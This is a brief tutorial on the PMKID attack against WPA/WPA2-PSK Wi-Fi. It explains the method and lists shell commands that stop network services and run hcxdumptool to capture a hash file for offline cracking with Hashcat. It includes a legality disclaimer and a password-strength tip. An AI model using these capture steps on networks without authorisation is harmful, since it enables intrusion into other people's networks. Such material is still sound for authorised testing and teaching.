PMKID Hash Capture

What is a PMKID Attack

The PMKID attack is a method used to crack WPA/WPA2-PSK Wi-Fi passwords. It targets the Pairwise Master Key Identifier (PMKID) exchange process in the 4-way handshake of the WPA/WPA2 authentication process. By capturing a PMKID hash and using a brute-force or dictionary attack, an attacker can attempt to recover the Wi-Fi password. This attack takes advantage of a weakness in the WPA/WPA2 protocol and the use of weak or easily guessable passwords. It is important to note that performing this attack without proper authorization is illegal and unethical. It is crucial to ensure the security of Wi-Fi networks by using strong passwords and implementing additional security measures.

Steps to follow to capture the PMKID Hash

installing Tools

you should install two tools: hcxdumptool , hcxpcapngtool

GitHub - ZerBea/hcxdumptool: Small tool to capture packets from wlan devices.GitHub

GitHub - ZerBea/hcxtools: Portable (that doesn't include proprietary/commercial operating systems) solution for conversion of cap/pcap/pcapng (gz compressed) WiFi dump files to hashcat formats (recommended by hashcat) and to John the Ripper formats. hcx: h = hash, c = convert and calculate candidates, x = different hashtypesGitHub

Just Follow Steps in the GitHub Repository to download them

Stop all services accessing the WIFI Network

sudo systemctl stop NetworkManager.service 
sudo systemctl stop wpa_supplicant.service

Capturing WIFI Network

sudo hcxdumptool -i [interface] -o dumpfile.pcapng --active_beacon --enable_status=15

Now, let this command run for some time to capture the required information

Start WIFI Network services again

sudo systemctl start wpa_supplicant.service 
sudo systemctl start NetworkManager.service

You can crack the pcapng file "dumpfile.pcapng" using a wordlist (like in the previous test) or using Hashcat:

Hashcat Cracking

What is a PMKID Attack

Steps to follow to capture the PMKID Hash

Other YouTube Tutorials